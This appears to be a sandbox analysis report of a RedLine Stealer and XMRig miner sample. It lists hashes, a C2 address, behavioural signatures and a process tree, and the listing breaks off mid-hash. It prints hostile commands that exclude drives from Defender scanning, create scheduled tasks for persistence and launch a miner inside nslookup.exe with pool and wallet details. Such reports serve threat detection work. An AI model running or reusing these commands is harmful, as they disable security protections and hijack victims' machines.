Analysis
-
max time kernel
148s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
26-10-2021 15:36
Static task
static1
Behavioral task
behavioral1
Sample
Software updated by Dylox.exe
Resource
win7-en-20210920
General
-
Target
Software updated by Dylox.exe
-
Size
3.2MB
-
MD5
6f78118b606c3c7c9bad1a9e0671cda8
-
SHA1
00abbc6a45d7009d8e166794289b39d0bb709ba5
-
SHA256
7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
-
SHA512
77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/1748-80-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1748-81-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1748-82-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/1748-83-0x0000000000418D32-mapping.dmp family_redline behavioral1/memory/1748-85-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1808-206-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-208-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-212-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-217-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-221-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-224-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-227-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-228-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-229-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-232-0x000000014030F3F8-mapping.dmp xmrig behavioral1/memory/1808-230-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1808-234-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 1924 Datafile32.exe 1072 Datafile64.exe 816 Server32.exe 1748 Server32.exe 540 services32.exe 1748 services64.exe 1476 sihost32.exe 1048 sihost64.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
services64.exeSoftware updated by Dylox.exeDatafile64.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe -
Loads dropped DLL 12 IoCs
Processes:
Software updated by Dylox.exeServer32.execmd.execmd.execonhost.execonhost.exepid process 1064 Software updated by Dylox.exe 1064 Software updated by Dylox.exe 1064 Software updated by Dylox.exe 1064 Software updated by Dylox.exe 1064 Software updated by Dylox.exe 816 Server32.exe 1164 cmd.exe 1164 cmd.exe 1936 cmd.exe 1416 conhost.exe 1416 conhost.exe 1956 conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1064-57-0x0000000000C80000-0x0000000000C81000-memory.dmp themida \Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral1/memory/1072-72-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Windows\System32\services64.exe themida \Windows\System32\services64.exe themida behavioral1/memory/1748-151-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 12 IoCs
Processes:
powershell.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exepid process 1064 Software updated by Dylox.exe 1072 Datafile64.exe 1748 services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Server32.execonhost.exedescription pid process target process PID 816 set thread context of 1748 816 Server32.exe Server32.exe PID 1956 set thread context of 1808 1956 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1612 schtasks.exe 1312 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
conhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exepid process 1956 conhost.exe 1696 powershell.exe 1416 powershell.exe 1748 Server32.exe 816 conhost.exe 1652 powershell.exe 1580 powershell.exe 1416 conhost.exe 1416 conhost.exe 1884 powershell.exe 984 powershell.exe 1956 conhost.exe 1956 conhost.exe 1912 powershell.exe 1112 powershell.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe 1808 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
Software updated by Dylox.execonhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exedescription pid process Token: SeDebugPrivilege 1064 Software updated by Dylox.exe Token: SeDebugPrivilege 1956 conhost.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeDebugPrivilege 1748 Server32.exe Token: SeDebugPrivilege 816 conhost.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 1416 conhost.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 1956 conhost.exe Token: SeDebugPrivilege 1912 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeLockMemoryPrivilege 1808 nslookup.exe Token: SeLockMemoryPrivilege 1808 nslookup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software updated by Dylox.exeServer32.exeDatafile32.execonhost.execmd.exeDatafile64.execmd.execonhost.execmd.execmd.exedescription pid process target process PID 1064 wrote to memory of 1924 1064 Software updated by Dylox.exe Datafile32.exe PID 1064 wrote to memory of 1924 1064 Software updated by Dylox.exe Datafile32.exe PID 1064 wrote to memory of 1924 1064 Software updated by Dylox.exe Datafile32.exe PID 1064 wrote to memory of 1924 1064 Software updated by Dylox.exe Datafile32.exe PID 1064 wrote to memory of 1072 1064 Software updated by Dylox.exe Datafile64.exe PID 1064 wrote to memory of 1072 1064 Software updated by Dylox.exe Datafile64.exe PID 1064 wrote to memory of 1072 1064 Software updated by Dylox.exe Datafile64.exe PID 1064 wrote to memory of 1072 1064 Software updated by Dylox.exe Datafile64.exe PID 1064 wrote to memory of 816 1064 Software updated by Dylox.exe Server32.exe PID 1064 wrote to memory of 816 1064 Software updated by Dylox.exe Server32.exe PID 1064 wrote to memory of 816 1064 Software updated by Dylox.exe Server32.exe PID 1064 wrote to memory of 816 1064 Software updated by Dylox.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 816 wrote to memory of 1748 816 Server32.exe Server32.exe PID 1924 wrote to memory of 1956 1924 Datafile32.exe conhost.exe PID 1924 wrote to memory of 1956 1924 Datafile32.exe conhost.exe PID 1924 wrote to memory of 1956 1924 Datafile32.exe conhost.exe PID 1924 wrote to memory of 1956 1924 Datafile32.exe conhost.exe PID 1956 wrote to memory of 1752 1956 conhost.exe cmd.exe PID 1956 wrote to memory of 1752 1956 conhost.exe cmd.exe PID 1956 wrote to memory of 1752 1956 conhost.exe cmd.exe PID 1752 wrote to memory of 1696 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 1696 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 1696 1752 cmd.exe powershell.exe PID 1956 wrote to memory of 1732 1956 conhost.exe cmd.exe PID 1956 wrote to memory of 1732 1956 conhost.exe cmd.exe PID 1956 wrote to memory of 1732 1956 conhost.exe cmd.exe PID 1752 wrote to memory of 1416 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 1416 1752 cmd.exe powershell.exe PID 1752 wrote to memory of 1416 1752 cmd.exe powershell.exe PID 1956 wrote to memory of 1164 1956 conhost.exe cmd.exe PID 1956 wrote to memory of 1164 1956 conhost.exe cmd.exe PID 1956 wrote to memory of 1164 1956 conhost.exe cmd.exe PID 1072 wrote to memory of 816 1072 Datafile64.exe conhost.exe PID 1072 wrote to memory of 816 1072 Datafile64.exe conhost.exe PID 1072 wrote to memory of 816 1072 Datafile64.exe conhost.exe PID 1072 wrote to memory of 816 1072 Datafile64.exe conhost.exe PID 1164 wrote to memory of 540 1164 cmd.exe services32.exe PID 1164 wrote to memory of 540 1164 cmd.exe services32.exe PID 1164 wrote to memory of 540 1164 cmd.exe services32.exe PID 816 wrote to memory of 1068 816 conhost.exe cmd.exe PID 816 wrote to memory of 1068 816 conhost.exe cmd.exe PID 816 wrote to memory of 1068 816 conhost.exe cmd.exe PID 1068 wrote to memory of 1652 1068 cmd.exe powershell.exe PID 1068 wrote to memory of 1652 1068 cmd.exe powershell.exe PID 1068 wrote to memory of 1652 1068 cmd.exe powershell.exe PID 816 wrote to memory of 584 816 conhost.exe cmd.exe PID 816 wrote to memory of 584 816 conhost.exe cmd.exe PID 816 wrote to memory of 584 816 conhost.exe cmd.exe PID 584 wrote to memory of 1312 584 cmd.exe schtasks.exe PID 584 wrote to memory of 1312 584 cmd.exe schtasks.exe PID 584 wrote to memory of 1312 584 cmd.exe schtasks.exe PID 1068 wrote to memory of 1580 1068 cmd.exe powershell.exe PID 1068 wrote to memory of 1580 1068 cmd.exe powershell.exe PID 1068 wrote to memory of 1580 1068 cmd.exe powershell.exe PID 816 wrote to memory of 1936 816 conhost.exe cmd.exe PID 816 wrote to memory of 1936 816 conhost.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Loads dropped DLL
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeC:\Users\Admin\AppData\Local\Temp\Server32.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015MD5
ab5c36d10261c173c5896f3478cdc6b7
SHA187ac53810ad125663519e944bc87ded3979cbee4
SHA256f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9
SHA512e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
702c6748b7a4f910e0732f1438f780b1
SHA1a75dfc1c0ad806dc51b76ba8c05f61d632484410
SHA2568d4a208ebbdb4926c8020bf3512819a93645e6698c58a8d28b22ba162289c1d6
SHA5127414c7823050892eef1126da5d0ea419945343671c9131ffa54ed7c8d7be20c97da5f7f5b65d6166ad000d293a7e1da57bf246eadeb79169a461aadc0667e508
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
a48e4ecd100871e98f3b6128f9b37187
SHA18adf645a05d8ede551aadaaf51a37a47071497b9
